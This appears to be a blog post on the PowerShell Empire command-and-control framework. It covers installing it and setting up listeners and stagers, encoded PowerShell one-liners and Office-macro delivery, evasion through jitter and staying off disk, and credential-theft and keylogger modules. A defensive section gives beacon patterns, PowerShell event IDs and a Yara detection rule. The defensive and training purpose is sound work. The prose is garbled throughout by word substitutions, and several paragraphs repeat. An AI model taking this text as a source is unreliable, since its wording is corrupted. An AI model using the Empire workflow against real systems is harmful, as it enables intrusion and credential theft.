In my last blog entry I explored some post-exploitation possibilities using PowerShell together with Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a laid of fantastic scripts capable of accomplishing siloed tasks; however, they lack the modularity together with plug-ability of a consummate framework. Today I desire to verbalize nearly a relatively novel entrant to the field—PowerShell Empire.
Although Empire is solely a yoke of months old, the developers (who also worked on Veil) cause got built an impressive lightweight management architecture that borrows heavily from projects similar PowerSploit together with PowerTools to practise a "pure PowerShell post-exploitation agent built on cryptographically-secure communications together with a flexible architecture." While working amongst it the past times yoke of days I cause got found that it has a familiar workflow for those who are accustomed to Metasploit, making it tardily to utilization for penetration testing Windows environments.
I cause got used Metasploit for many years, dabbled amongst Core Impact, together with explored Armitage/Cobalt Strike at corking length. These are all fantastic frameworks that are incredibly extensible, cause got rigid community back upwardly together with regular evolution unloosen cycles. But the PowerSploit framework isn't just 'built-in' to those solutions (Cobalt Strike allows y'all to import modules making it perhaps the easiest to extend inward damage of PowerShell based attacks). I've had a few conversations lately amongst people who are unsure nearly what framework they should live using together with my response is ever the same, it depends. What y'all choose is largely theme on fiscal limitations together with objectives but inward the cease it is likely best that y'all acquire familiar amongst all of these offerings.
There are a yoke of primal features inward Empire:
We tin flame come across the beacon issues 3 GET requests inside a curt catamenia of fourth dimension during a telephone phone dwelling household interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp together with cause got a generic Mozilla User-Agent. 
Although Empire is solely a yoke of months old, the developers (who also worked on Veil) cause got built an impressive lightweight management architecture that borrows heavily from projects similar PowerSploit together with PowerTools to practise a "pure PowerShell post-exploitation agent built on cryptographically-secure communications together with a flexible architecture." While working amongst it the past times yoke of days I cause got found that it has a familiar workflow for those who are accustomed to Metasploit, making it tardily to utilization for penetration testing Windows environments.
I cause got used Metasploit for many years, dabbled amongst Core Impact, together with explored Armitage/Cobalt Strike at corking length. These are all fantastic frameworks that are incredibly extensible, cause got rigid community back upwardly together with regular evolution unloosen cycles. But the PowerSploit framework isn't just 'built-in' to those solutions (Cobalt Strike allows y'all to import modules making it perhaps the easiest to extend inward damage of PowerShell based attacks). I've had a few conversations lately amongst people who are unsure nearly what framework they should live using together with my response is ever the same, it depends. What y'all choose is largely theme on fiscal limitations together with objectives but inward the cease it is likely best that y'all acquire familiar amongst all of these offerings.
There are a yoke of primal features inward Empire:
- Invoke Expression together with Web Client download cradles allow y'all to rest off disk equally much equally possible. Evading on-access scanners is crucial together with leaving equally few forensic artifacts equally possible is just proficient trade-craft.
- The agent beacons inward a cryptographically secure agency together with inward a agency that effectively emulates command together with command traffic.
As penetration testers our finish should live to effectively mimic real-world assault methodologies, network traffic together with end-point activity to render clients amongst a laid of indicators of compromise that tin flame live effectively used to position monitoring gaps. Tools similar Empire assistance to force these ideas forrad together with cut down the latency betwixt assaulter conception together with defender evolution.
In this ship I desire to demonstrate how to utilization Empire, acquit basic IR retention analysis (in the same format equally my previous article) and, to a greater extent than importantly, highlight some give-and-take to a greater extent than or less automated detection at the network together with host level.
Red Team
I used Kali (2.0) for my server but I'm sure this would piece of job on most Debian based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the next command from the Empire origin directory amongst the -debug switch enabled to ensure logs are stored for troubleshooting together with tracing your activity:
./empire -debug
Empire uses the concept of listeners, stagers together with agents. Influenza A virus subtype H5N1 listener is a network socket instantiated on the server side that manages connections from infected agents. Influenza A virus subtype H5N1 stager is the payload y'all retrieve to deliver to the victim machine. To access your listeners merely type ‘listeners’ to come inward the listeners context, followed past times ‘info’.
There are a few of import values to greenback here. First, y'all tin flame specify a KillDate together with WorkingHours to bound agent together with listener activity based on projection limitations. I cause got surely worked on a number of engagements inward which a customer had real specific restrictions nearly when nosotros could work, which would cause got proved invaluable.
Second, the DefaultJitter value volition assistance evade solutions that displace to position malicious beacon patterns that occur at a constant interval, together with imply scripted or machine similar activity that evidently stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which nosotros volition verbalize to a greater extent than nearly later.
Third, define variables using 'set [variablename] [value]' syntax, together with activate the listener amongst the 'execute' command . Type listing to verify that the listener is active together with a network socket has been opened.
Second, the DefaultJitter value volition assistance evade solutions that displace to position malicious beacon patterns that occur at a constant interval, together with imply scripted or machine similar activity that evidently stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which nosotros volition verbalize to a greater extent than nearly later.
Third, define variables using 'set [variablename] [value]' syntax, together with activate the listener amongst the 'execute' command . Type listing to verify that the listener is active together with a network socket has been opened.
Logically the side past times side stride is define a payload together with choose a payload delivery mechanism. Type 'usestager' followed past times TAB+TAB to come across a listing of options.
The 2 options that are best suited for payload execution are launcher together with macro. Launcher volition generate a PowerShell one-liner (Base64 encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an business office macro amongst the appropriate callback values to constitute a connexion amongst the listener. This tin flame live embedded inward an business office document together with used inward social applied scientific discipline attacks equally a payload delivery mechanism.
To choose a stager type 'usestager [stagername] [listenername]' followed past times 'execute'.
In the ikon inward a higher position y'all tin flame come across that the listener callback details are embedded inward the script, together with a (possibly) hard-coded value of /index.asp is used for the agent GET request. The session value for the agent is included. Base64 encoding the script volition plough on the '-Enc' PowerShell flag which volition decrypt the payload at run-time making investigation together with tractability to a greater extent than hard (again, simulating a existent breach.)
After executing this one-liner on our victim machine y'all volition have a callback notification that a novel connexion has been established. You tin flame honour active agents past times typing 'agents' followed past times 'list'.
Now that a connexion is established y'all tin flame type 'interact [agentname]' to hop into an agent session similar to meterpreter. Enter 'usemodule' followed past times TAB+TAB to come across all available options. You tin flame position privilege escalation opportunities, displace laterally, constitute persistence, steal tokens/credentials, install key-loggers together with run all of the amazing ship exploitation tasks available from the PowerSploit/PowerTools exploitation kits. I don't desire to become into particular for each of these modules equally it is non the intent of this post. I merely wanted to demonstrate how to acquire upwardly together with running to encourage to a greater extent than offensive-security professionals to comprehend this tool.
Blue Team
My objective for the defensive aspect of this ship is to acquit some high degree analysis of the tool itself together with the full general methods it employs. There are a lot of modules available together with of course of written report each of these may acquire out behind specific indicators of attack/compromise but it's non my finish to become into each of them for this post.
Let's accept a hold off at some of the network traffic first.
Let's accept a hold off at some of the network traffic first.
We come across that after the initial stager is executed our start connexion is established. On its ain this is an extremely wretched indicator. GET requests to /index.asp are going to live real mutual on whatsoever network. However, it does appear to live a hard-coded value together with it's of import to assemble equally much information equally possible.
After this initial connexion a minute phase payload is downloaded, primal negotiation occurs, an encrypted session is established together with the agent starts beaconing. This beacon is characterized past times the DefaultProfile variable laid for the listener running on the Empire server.
We tin flame come across the beacon issues 3 GET requests inside a curt catamenia of fourth dimension during a telephone phone dwelling household interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp together with cause got a generic Mozilla User-Agent.
Again, individually each of these actions appears benign together with alerting on it would generate a pregnant number of fake positives (which is the intention of the framework.) If nosotros hold off at this traffic collectively nosotros could pattern a network IDS dominion that alerts when a connexion is made to /index.ASP together with is followed past times at to the lowest degree 3 GET requests to at to the lowest degree 2 of the GET requests inward the ikon above.
Moreover, many organizations may number tight controls to a greater extent than or less the type of Browser application that tin flame live installed, together with it is unlikely to come across a Windows server amongst Firefox running. If y'all are a scheme administrator that has implemented application white-listing together with your users should solely live using IE, the presence of Mozilla/Chrome/Opera UA indicates a policy violation (best instance scenario) or a manually crafted UA (worst instance perhaps indicating malware). In whatsoever event, it is possible to at to the lowest degree utilization this information to profile other infected hosts fifty-fifty if it doesn't serve equally a dot of initial detection. It's proficient to cause got options.
Moreover, many organizations may number tight controls to a greater extent than or less the type of Browser application that tin flame live installed, together with it is unlikely to come across a Windows server amongst Firefox running. If y'all are a scheme administrator that has implemented application white-listing together with your users should solely live using IE, the presence of Mozilla/Chrome/Opera UA indicates a policy violation (best instance scenario) or a manually crafted UA (worst instance perhaps indicating malware). In whatsoever event, it is possible to at to the lowest degree utilization this information to profile other infected hosts fifty-fifty if it doesn't serve equally a dot of initial detection. It's proficient to cause got options.
Of course of written report all of this tin flame live customized inward Empire, thus from a heuristic perspective I retrieve the of import accept away actually is recognizing the pattern itself together with non necessarily the specific implementation of that pattern. That is a picayune flake esoteric thus let's assay together with assemble to a greater extent than information from the host.
Dave lately published a two part series on Windows lawsuit monitoring. This is a fantastic starting dot for most organizations, peculiarly those who are novel to SIEM. I soundless come upwardly across a lot of environments that practise non cause got whatsoever formal log management program, allow lone a properly deployed SIEM amongst a proficient alerting framework that has been adequately tuned. For most companies, implementing monitoring for the lawsuit IDs Dave highlighted is a proficient objective. But for those amongst a to a greater extent than mature safety program, I retrieve it's of import to start looking at PowerShell events.
PowerShell 2.0 is the default installed version for Windows seven together with Server 2008 R2 (prior versions practise non cause got PowerShell installed) together with unfortunately it does non render much information from a logging perspective.
There are primarily 2 log files that are accessible:
- Microsoft Windows PowerShell
- Microsoft Windows PowerShell Operational
It is also possible to enable analytic together with debug logging notwithstanding this is fairly noisy together with resources intensive. Open Event Viewer together with choose View -> Show Analytic together with Debug Logs. Then browse Application together with Service Logs -> Microsoft -> Windows -> PowerShell together with correct click Analytic to enable it. I don't retrieve at that spot is a lot of value add together hither but it tin flame live useful when debugging a script or troubleshooting a problem.
In the 2.0 version of the Microsoft Windows PowerShell Operational log y'all volition cause got the next events of interest:
- 40961 - Console is starting up
- 40962 - Console is laid upwardly for user input
These logs practise comprise meta information such equally the user who performed the event, together with the estimator it was executed on but it is pretty limited. If y'all practise non utilization PowerShell inward your surroundings (even pocket-size organizations cause got utilization cases thus this is unlikely) together with thus perhaps alerting on ane of these events may live useful but at that spot is real picayune contextual information stored inward the lawsuit log to dot what was done piece the console was accessed.
The Microsoft Windows PowerShell log inward version 2.0 of PowerShell volition frequently generate these lawsuit IDs:
- 600 - Provider Life-cycle
- 400 - Engine Life-cycle
- 403 - Engine Life-cycle
Again these events are fairly nondescript together with render picayune information.
Event ID 5156 from the Windows Security audit log tin flame render some additional information regarding network connections if nosotros effectively filter to alarm on Outbound, external, connections generated from applications similar powershell.exe.
None of these indicators are of whatsoever substantial quality, but thankfully Microsoft introduced some improvements inward version 3.0 of PowerShell (no additional changes to lawsuit logging functionality inward version 4.0 or 5.0 unfortunately).
After upgrading to PowerShell version 3.0 y'all tin flame specify a GPO setting to plough on module logging for Windows PowerShell modules inward all sessions of all affected computers. Pipeline execution events for the selected modules volition together with thus live recorded inward the PowerShell lawsuit logs I covered earlier. You tin flame also interactively enable these values equally shown below. This is shown inward the ikon below:
If nosotros instantly execute our PowerShell Empire one-line stager nosotros volition cause got to a greater extent than lawsuit log information to piece of job with. Event IDs 4103 together with 800 are recorded together with comprise a veritable wealth of information that tin flame live used to honour suspicious activity.
At this dot nosotros tin flame launch Rekall, listing processes, position suspect network connections, dump procedure retention together with perform keyword string searches.
This is a similar workflow to my prior post. In large retention dumps it tin flame live hard (time consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly cut down this piece of job displace but a improve solution inward my persuasion is to write Yara rules together with utilization them inward conjunction amongst Volatility. If y'all aren't familiar, Yara is a tool designed to assistance execute binary or textual pattern fit searches. It is real tardily to write rules equally the syntax is tardily to pick up. Save the next to a text file amongst the .YARA extension.
dominion illustration : powershell
{
meta:
Description = "Look for suspect powershell artificats."
filetype = "MemoryDump"
Author = "Greg Carson"
Date = "09-09-2015"
strings:
$s0 = "Invoke-" ascii
$s1 = "-Enc" ascii
condition:
2 of them
}
This tin flame together with thus live imported to perform a search inward Volatility:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860
The workflow demonstrated on the Blue Team side of things isn't necessarily inward whatsoever order. Ideally, y'all would cause got a SIEM dominion trigger based on a suspicious pipeline execution PowerShell lawsuit (that has appropriate filters together with suppression enabled), which results inward an investigation of network traffic prior to together with presently after the lawsuit together with is followed past times a to a greater extent than thorough alive retention forensic analysis of the scheme together with others it may cause got had contact with. But this may non live possible depending on the surroundings y'all bring out yourself in. It's of import non to rely on whatsoever ane unmarried safety solution equally the indicators of assault volition frequently be inward many different places together with across disparate entities that solve different problems.
EDIT:
@tifkin_ contacted me to cite an additional tool from Mark Russinovich titled 'Sysmon'. It's a picayune flake exterior the range of this ship but the tool itself shows a lot of promise, I'd recommend defenders hold off into this.
EDIT:
@tifkin_ contacted me to cite an additional tool from Mark Russinovich titled 'Sysmon'. It's a picayune flake exterior the range of this ship but the tool itself shows a lot of promise, I'd recommend defenders hold off into this.
Related Links:
